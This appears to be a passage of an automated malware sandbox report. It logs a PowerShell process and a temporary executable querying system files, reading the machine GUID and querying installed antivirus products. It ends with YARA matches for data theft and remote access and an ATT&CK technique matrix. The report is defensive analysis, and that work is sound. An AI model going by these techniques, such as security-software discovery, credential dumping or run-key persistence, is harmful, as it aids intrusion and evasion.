        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: powershell.exe, 00000010.00000002.2592529714.00000121C3CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information112
        Scripting
        Valid Accounts11
        Windows Management Instrumentation
        112
        Scripting
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        OS Credential Dumping1
        File and Directory Discovery
        Remote Services11
        Archive Collected Data
        1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Native API
        1
        DLL Side-Loading
        11
        Process Injection
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory23
        System Information Discovery
        Remote Desktop ProtocolData from Removable Media3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Obfuscated Files or Information
        Security Account Manager231
        Security Software Discovery
        SMB/Windows Admin SharesData from Network Shared Drive11
        Encrypted Channel
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Command and Scripting Interpreter
        1
        Office Application Startup
        21
        Registry Run Keys / Startup Folder
        1
        Software Packing
        NTDS1
        Process Discovery
        Distributed Component Object ModelInput Capture1
        Non-Standard Port
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts1
        Scheduled Task/Job
        21
        Registry Run Keys / Startup Folder
        Network Logon Script1
        Timestomp
        LSA Secrets241
        Virtualization/Sandbox Evasion
        SSHKeylogging3
        Non-Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable Media4
        PowerShell
        RC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials1
